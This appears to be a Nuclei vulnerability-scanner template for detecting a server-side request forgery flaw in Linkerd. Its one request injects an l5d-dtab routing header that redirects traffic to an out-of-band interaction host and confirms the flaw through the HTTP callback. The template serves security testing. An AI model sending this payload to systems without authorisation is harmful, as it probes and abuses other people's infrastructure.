24 lines
491 B
YAML
24 lines
491 B
YAML
id: linkerd-ssrf-detection
|
|
|
|
info:
|
|
name: Linkerd SSRF detection
|
|
author: dudez
|
|
severity: high
|
|
reference:
|
|
- https://twitter.com/nirvana_msu/status/1084144955034165248
|
|
tags: ssrf,linkerd,oast
|
|
metadata:
|
|
max-request: 1
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}"
|
|
headers:
|
|
l5d-dtab: /svc/* => /$/inet/{{interactsh-url}}/443
|
|
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol # Confirms the HTTP Interaction
|
|
words:
|
|
- "http" |